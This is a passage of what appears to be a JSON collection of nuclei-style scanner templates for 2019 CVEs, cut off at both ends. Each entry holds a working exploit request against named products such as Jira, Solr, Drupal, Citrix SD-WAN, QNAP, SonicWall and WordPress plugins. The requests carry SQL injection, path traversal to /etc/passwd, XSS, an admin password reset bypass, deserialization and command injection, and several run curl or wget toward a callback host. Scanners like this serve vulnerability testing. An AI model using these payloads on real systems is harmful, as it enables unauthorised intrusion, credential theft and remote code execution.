Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20933","info":{"name":"InfluxDB <1.7.6 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"results\":","\"name\":\"databases\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18818","info":{"name":"strapi CMS <3.0.0-beta.17.5 - Admin Password Reset","severity":"critical"},"requests":[{"raw":["POST /admin/auth/reset-password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"username\":","\"email\":","\"jwt\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".user.username",".user.email"]}]}]},{"id":"CVE-2019-8442","info":{"name":"Jira - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14974","info":{"name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["url = window.location.search.split(\"?desktop_url=\")[1]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9041","info":{"name":"ZZZCMS 1.6.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/search/"],"body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo","PHP Version"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7481","info":{"name":"SonicWall SRA 4600 VPN - SQL Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supportInstaller HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nUser-Agent: MSIE\nContent-Type: application/x-www-form-urlencoded\n\nfromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--\n"],"matchers":[{"type":"word","part":"body","words":["4220397236"]}]}]},{"id":"CVE-2019-16996","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1918835981"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12616","info":{"name":"phpMyAdmin <4.9.0 - Cross-Site Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.9.0')"]},{"type":"word","words":["phpmyadmin.net","phpMyAdmin"],"condition":"or"},{"type":"status","status":[200,401]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]}]}]},{"id":"CVE-2019-14750","info":{"name":"osTicket < 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /upload/setup/install.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ns=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo\n","GET /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1\n","GET /upload/scp/settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(1);>","getConfig().resolve"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-18922","info":{"name":"Allied Telesis AT-GS950/8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12990","info":{"name":"Citrix SD-WAN Center - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfilename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n","GET /talari/app/files/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code_3 == 200","contains(body_1, \"<title>Citrix SD-WAN</title>\")"],"condition":"and"}]}]},{"id":"CVE-2019-9733","info":{"name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical"},"requests":[{"raw":["POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nX-Requested-With: artUI\nX-Forwarded-For: 127.0.0.1\nRequest-Agent: artifactoryUI\nContent-Type: application/json\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/artifactory/webapp/\n\n{\"user\":\"access-admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\": \"access-admin\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16932","info":{"name":"Visualizer <3.3.1 - Blind Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/visualizer/v1/upload-data"],"body":"{\\\"url\\\":\\\"http://{{interactsh-url}}\\\"}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5127","info":{"name":"YouPHPTube Encoder 2.3 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png","{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg","{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/objects/{{filename}}.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11248","info":{"name":"Debug Endpoint pprof - Exposure Detection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/debug/pprof/","{{BaseURL}}/debug/pprof/goroutine?debug=1"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["Types of profiles available:","Profile Descriptions","goroutine profile: total"],"condition":"or"}]}]},{"id":"CVE-2019-17662","info":{"name":"ThinVNC 1.0b1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["User=","Password="],"condition":"and"},{"type":"word","part":"header","words":["application/binary"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20141","info":{"name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>","{{BaseURL}}/admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=x onerror=alert(1)>>)1(trela=rorreno"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-12593","info":{"name":"IceWarp Mail Server <=10.4.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd"],"matchers-condition":"and","matchers":[{"type":"word","words":["[intl]","root:x:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11869","info":{"name":"WordPress Yuzo <5.12.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nyuzo_related_post_css_and_style=</style><script>alert(0);</script>\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"<script>alert(0);</script>\")"]},{"type":"dsl","dsl":["contains(tolower(header_2), 'text/html')"]}]}]},{"id":"CVE-2019-17538","info":{"name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14312","info":{"name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6802","info":{"name":"Pypiserver <1.2.5 - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"word","part":"header","words":["Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2019-12988","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-17558","info":{"name":"Apache Solr <=8.3.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","POST /solr/{{core}}/config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"update-queryresponsewriter\": {\n      \"startup\": \"lazy\",\n      \"name\": \"velocity\",\n      \"class\": \"solr.VelocityResponseWriter\",\n      \"template.base.dir\": \"\",\n      \"solr.resource.loader.enabled\": \"true\",\n      \"params.resource.loader.enabled\": \"true\"\n    }\n}\n","GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-7192","info":{"name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /photo/p/api/album.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\na=setSlideshow&f=qsamplealbum\n","GET /photo/slideshow.php?album={{album_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /photo/p/api/video.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nalbum={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["admin:.*:0:0:"]},{"type":"word","part":"header_3","words":["video/subtitle"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"album_id","part":"body_1","group":1,"regex":["<output>([a-zA-Z]+)<\\/output>"],"internal":true},{"type":"regex","name":"access_code","part":"body_2","group":1,"regex":["encodeURIComponent\\('([A-Za-z0-9]+)'\\)"],"internal":true}]}]},{"id":"CVE-2019-14696","info":{"name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3396","info":{"name":"Atlassian Confluence Server - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nReferer: {{Hostname}}\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<param-name>contextConfigLocation</param-name>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3403","info":{"name":"Jira - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/2/user/picker?query="],"matchers-condition":"and","matchers":[{"type":"word","words":["\"users\":","\"total\":","\"header\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","negative":true,"words":["Showing 0 of 0 matching users"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3912","info":{"name":"LabKey Server Community Edition <18.3.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-2616","info":{"name":"Oracle Business Intelligence/XML Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /xmlpserver/ReportTemplateService.xls HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nContent-Type: text/xml; charset=UTF-8\n\n<!DOCTYPE soap:envelope PUBLIC \"-//B/A/EN\" \"http://{{interactsh-url}}\">\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-11013","info":{"name":"Nimble Streamer <=3.5.4-9 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2578","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0  - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"body","regex":["<script[\\d\\D]*<throwexception/>"]}]}]},{"id":"CVE-2019-15713","info":{"name":"WordPress My Calendar <= 3.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6340","info":{"name":"Drupal - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/node/1?_format=hal_json"],"body":"{ \"link\": [ { \"value\": \"link\", \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\" } ], \"_links\": { \"type\": { \"href\": \"http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\" } } }","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8451","info":{"name":"Jira <8.4.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/plugins/servlet/gadgets/makeRequest"],"body":"url=https://{{Host}}:443@{{interactsh-url}}\n","headers":{"X-Atlassian-Token":"no-check","Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-12276","info":{"name":"GrandNode 4.40 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"],"headers":{"Connection":"close"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16525","info":{"name":"WordPress Checklist <1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17418","info":{"name":"MetInfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16057","info":{"name":"D-Link DNS-320 -  Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"uid=\", \"gid=\", \"pwd&id\")"],"condition":"and"}]}]},{"id":"CVE-2019-2767","info":{"name":"Oracle Business Intelligence Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//{{interactsh-url}}/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-20183","info":{"name":"Simple Employee Records System 1.0 - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /dashboard/uploadID.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337\n\n-----------------------------5825462663702204104870787337\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"poc.php\"\nContent-Type: image/png\n\n<?php\necho md5('CVE-2019-20183');\nunlink(__FILE__);\n?>\n-----------------------------5825462663702204104870787337--\n","GET /uploads/employees_ids/{{endpoint}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["1ad0d710225c472cb7396b3c1d97e4dd"]}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?:[a-zA-Z0-9+\\/])*_poc.php"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-1821","info":{"name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /servlet/UploadServlet HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nPrimary-IP: 127.0.0.1\nFilename: test.tar\nFilesize: 10240\nCompressed-Archive: false\nDestination-Dir: tftpRoot\nFilecount: 1\nContent-Length: 269\nContent-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83\n\n--871a4a346a547cf05cb83f57b9ebcb83\nContent-Disposition: form-data; name=\"files\"; filename=\"test.tar\"\n\n../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar  00000000000000{{randstr}}\n--871a4a346a547cf05cb83f57b9ebcb83--\n","GET /test.txt HTTP/1.1\nHost: {{Host}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains((body_2), '{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2019-12985","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/ping HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-15859","info":{"name":"Socomec DIRIS A-40 Devices Password Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.jsn"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/json"]},{"type":"word","part":"body","words":["username","password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0193","info":{"name":"Apache Solr DataImportHandler <8.2.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\ncommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-16662","info":{"name":"rConfig 3.9.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3799","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17270","info":{"name":"Yachtcontrol Webapplication 1.0 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1653","info":{"name":"Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/config.exp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sysconfig"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20224","info":{"name":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /pandora_console/index.php?login=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnick=admin&pass=admin&login_button=Login\n","POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 